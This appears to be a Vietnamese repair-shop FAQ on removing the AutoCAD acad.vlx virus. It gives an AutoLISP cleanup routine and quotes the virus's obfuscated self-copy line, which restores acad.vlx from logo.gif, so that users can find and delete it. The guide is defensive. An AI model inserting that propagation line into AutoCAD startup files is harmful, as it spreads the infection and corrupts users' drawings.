FAQ‎ > ‎

Cách diệt virut Acad.vlx acad.fas

đăng 07:05, 24 thg 5, 2012 bởi Phan Vũ Hầu   [ đã cập nhật 18:50, 25 thg 5, 2012 ]

Từ khóa: sửa máy tính tại nhà , sửa máy tính hà nội , kaspersky 2012, diệt virut, sửa laptop hà nội , sửa mạng máy tính , cứu dữ liệu

Gần đây Trung Tâm Cứu Hộ Máy Tính Hà Nội GPC ghi nhận nhiều trường hợp khách hàng bên mảng kiến trúc bị nhiễm virut Acad.vlx acad.fas

Làm thế nào để phát hiện và loại bỏ vi rút Acad.vlx

sua may tinh

Vấn đề

Người sử dụng sản phẩm dựa trên AutoCAD đã báo cáo một tập tin acad.vlx độc hại
Giải pháp

Đây không phải là một tập tin AutoCAD thực tế được cung cấp bởi Autodesk. Khi tập tin acad.vlx độc hại được tải trong AutoCAD, nó bị sai lệch các bản vẽ, có thể dẫn đến một hộp Ngôn ngữ Gói Thiếu hộp thoại hiển thị khi bạn lưu và mở lại các bản vẽ.

Các tập tin acad.vlx tạo ra một bản sao của chính nó trong thư mục Help (ví dụ, C: \ Program Files \ AutoCAD 20XX \ \ logo.gif). Một số tập tin khác cũng được sửa đổi và biến hệ thống ACADLSPASDOC được thiết lập để 1, cho phép các tập tin acad.vlx để được nạp vào bản vẽ khác mở ra, do đó làm hư chúng.

Các quá trình dọn dẹp nêu dưới đây phát hiện và xóa bất kỳ tập tin acad.vlx trước khi AutoCAD cố gắng để tải nó, ngăn chặn sự lây lan của virus.
Để ngăn chặn tham nhũng tập tin bổ sung

Bạn phải là một quản trị hệ thống Microsoft ® hệ điều hành Windows ® để hoàn thành quá trình này.

  
 1. In your product installation folder, locate the Support folder (for example, C:\Program Files\AutoCAD 20xx\Support).

 2. In the Support folder, double-click the acad20xx.lsp file (for example, the acad20xx.lsp file). Add the code below to the file. AutoCAD will detect and delete the acad.vlx and logo.gif files.
  
 1. (defun cleanvirus( / lspfiles lspfile x)
    (setq lspfiles '("acad.vlx" "logo.gif"))
    (foreach lspfile lspfiles
      (while (setq x (findfile lspfile))
        (progn
          (vl-file-delete x)
          (princ "\nDeleted file ")
          (princ x)
        );progn
      );while
    );foreach
  )
  (cleanvirus)

 2. Open each of the following files:
  • C:\Program Files\AutoCAD 20xx\Express\acetauto.lsp
  • C:\Program Files\AutoCAD 20xx\Support\ai_utils.lsp
  • ROAMABLEROOTPREFIX\Support\acad.mnl
   Note: Replace ROAMABLEROOTPREFIX with the value returned by the ROAMABLEROOTPREFIX system variable.
 3. If present, delete the following line of code:

  (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))


MPBKQNFX43QD

Comments